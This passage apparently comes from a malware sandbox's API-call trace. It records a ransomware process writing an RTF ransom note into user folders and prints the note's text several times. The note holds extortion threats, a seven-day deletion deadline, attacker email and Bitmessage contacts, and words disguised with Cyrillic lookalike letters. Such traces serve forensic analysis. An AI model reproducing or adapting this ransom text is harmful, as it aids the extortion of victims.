R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.086] WriteFile (in: hFile=0x2e8, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.087] CloseHandle (hObject=0x2e8) returned 1 [0292.087] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\#readme_eman#.rtf")) returned 0xffffffff [0292.087] GetLastError () returned 0x2 [0292.087] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE 